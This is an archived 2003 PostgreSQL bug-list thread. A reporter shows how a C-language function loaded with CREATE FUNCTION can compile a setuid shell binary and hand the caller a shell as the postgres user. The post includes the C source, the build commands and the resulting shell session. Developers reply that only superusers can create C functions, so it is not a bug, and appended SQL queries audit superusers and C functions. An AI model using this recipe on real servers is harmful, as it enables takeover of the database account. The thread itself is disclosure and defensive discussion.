
[BUGS] "Bug" report - Serious (local shell)

mailing.database.pgsql-bugs


Diego Linke - GAMK
 

[BUGS] "Bug" report - Serious (local shell) - 08-14-2003, 01:16 PM







============================================================================
POSTGRESQL BUG REPORT TEMPLATE
============================================================================


Your name : Diego Linke
Your email address : gamk (AT) gamk (DOT) com.br

System Configuration
---------------------
Architecture (example: Intel Pentium) : Intel

Operating System (example: Linux 2.0.26 ELF) : NetBSD 1.6.1_STABLE

PostgreSQL version (example: PostgreSQL-7.3.2): PostgreSQL-7.3.2

Compiler used (example: gcc 2.95.2) : 2.95.3 20010315

Please enter a FULL description of your problem:
------------------------------------------------

The problem is that PostgreSQL, when it calls a function in external C, calls it as the postgres user.
A bad user will be able to create a binary with a suid shell for the postgres user, and to assume control of postgres (pg_hba.conf, databases, postmaster, in short everything that the postgres user can do).
I presume that this problem exists in all versions of postgres.


See this example:

(work/ttyp2:/tmp/ja_era)> id
uid=1000(gamk) gid=100(users) groups=100(users),0(wheel),5(operator)
(work/ttyp2:/tmp/ja_era)> id pgsql
uid=1001(pgsql) gid=1000(pgsql) groups=1000(pgsql)
(work/ttyp2:/tmp/ja_era)> cat supg.c
main() {
setuid(1001);
setgid(1000);
system("/bin/sh");
}
(work/ttyp2:/tmp/ja_era)> cat func.c
#include <stdlib.h>

int execute(int x) {
system("gcc -o /tmp/ja_era/supg /tmp/ja_era/supg.c");
system("chmod a+x /tmp/ja_era/supg");
system("chmod u+s /tmp/ja_era/supg");
return(x+1);
}
(work/ttyp2:/tmp/ja_era)> cc -c -fpic func.c
(work/ttyp2:/tmp/ja_era)> cc -o func.so -shared func.o
(work/ttyp2:/tmp/ja_era)> psql teste
Welcome to psql 7.3.2, the PostgreSQL interactive terminal.

Type: \copyright for distribution terms
\h for help with SQL commands
\? for help on internal slash commands
\g or terminate with semicolon to execute query
\q to quit

teste=# CREATE FUNCTION execute (integer) RETURNS integer AS '/tmp/ja_era/func.so' LANGUAGE C;
CREATE FUNCTION
teste=# SELECT execute(5);
execute
---------
6
(1 row)

teste=# \q
(work/ttyp2:/tmp/ja_era)> ls -l supg
-rws--x--x 1 pgsql wheel 6029 Aug 14 08:41 supg*
(work/ttyp2:/tmp/ja_era)> ./supg
$ whoami
pgsql
$ id
uid=1000(gamk) euid=1001(pgsql) gid=100(users) groups=100(users),0(wheel),5(operator)
$ touch /tmp/teste
$ ls -l /tmp/teste
-rw-r--r-- 1 pgsql wheel 0 Aug 14 08:42 /tmp/teste
$



--
[ Diego Linke - GAMK ]
System/Network/Security Administrator
E-Mail/Site: gamk (AT) gamk (DOT) com.br - http://www.gamk.com.br
Public Key: http://www.gamk.com.br/gamk.asc
Phone Number: (+5541) 9967-3464


---------------------------(end of broadcast)---------------------------
TIP 2: you can get off all lists at once with the unregister command
(send "unregister YourEmailAddressHere" to majordomo (AT) postgresql (DOT) org)

Stephan Szabo
 

Re: [BUGS] "Bug" report - Serious (local shell) - 08-14-2003, 01:54 PM






On Thu, 14 Aug 2003, Diego Linke - GAMK wrote:

> Your name : Diego Linke
> Your email address : gamk (AT) gamk (DOT) com.br
>
> System Configuration
> ---------------------
> Architecture (example: Intel Pentium) : Intel
>
> Operating System (example: Linux 2.0.26 ELF) : NetBSD 1.6.1_STABLE
>
> PostgreSQL version (example: PostgreSQL-7.3.2): PostgreSQL-7.3.2
>
> Compiler used (example: gcc 2.95.2) : 2.95.3 20010315
>
> Please enter a FULL description of your problem:
> ------------------------------------------------
>
> The problem is that PostgreSQL, when it calls a function in external C,
> calls it as the postgres user.
> A bad user will be able to create a binary with a suid shell for the
> postgres user, and to assume control of postgres (pg_hba.conf,
> databases, postmaster, in short everything that the postgres user can
> do).

Only a bad database superuser should be able to do anything of the sort
because normal users shouldn't be allowed to use CREATE FUNCTION with C
language functions (it's untrusted), are you seeing something different?


---------------------------(end of broadcast)---------------------------
TIP 5: Have you checked our extensive FAQ?

http://www.postgresql.org/docs/faqs/FAQ.html


Tom Lane
 

Re: [BUGS] "Bug" report - Serious (local shell) - 08-14-2003, 02:47 PM



Diego Linke - GAMK <linke (AT) calnet (DOT) com.br> writes:
> The problem is that PostgreSQL, when it calls a function in external C,
> calls it as the postgres user.

The ability to create C functions is reserved to superusers, for exactly
this reason. If you have the rights to make the backend execute
arbitrary C code, you hardly need a shell to do something nasty.

In short, this is not a bug. Don't give superuser privileges to people
you cannot trust.

regards, tom lane
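
The replies above rest on two facts an administrator can check directly: which roles are superusers, and which C-language functions are already registered and from where. The following audit queries are an added example, not part of the original thread; they assume a PostgreSQL release that has the pg_roles view (8.1 or later), whereas the 7.3 server in the report kept the superuser flag in pg_shadow.usesuper.

```sql
-- Added example (not from the thread). Assumes PostgreSQL 8.1+ catalogs.

-- 1. Roles that hold superuser rights. Per the replies above, only these
--    roles can run CREATE FUNCTION ... LANGUAGE C, so this list is the
--    set of accounts that can make the backend load native code.
SELECT rolname, rolcanlogin
FROM pg_roles
WHERE rolsuper
ORDER BY rolname;

-- 2. C-language functions whose shared object is not referenced through
--    $libdir. A library path such as the /tmp/ja_era/func.so used in the
--    report shows up here; each row deserves a review of who owns the
--    function and who can write to the file.
SELECT n.nspname                   AS schema_name,
       p.proname                   AS function_name,
       pg_get_userbyid(p.proowner) AS owner,
       p.probin                    AS library
FROM pg_proc p
JOIN pg_language  l ON l.oid = p.prolang
JOIN pg_namespace n ON n.oid = p.pronamespace
WHERE l.lanname = 'c'
  AND p.probin NOT LIKE '$libdir/%'
ORDER BY p.probin, n.nspname, p.proname;

-- 3. Languages that are not marked trusted, with their ACLs. An empty
--    (NULL) lanacl means no USAGE has been granted beyond the defaults.
SELECT lanname, lanpltrusted, lanacl
FROM pg_language
WHERE NOT lanpltrusted
ORDER BY lanname;
```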
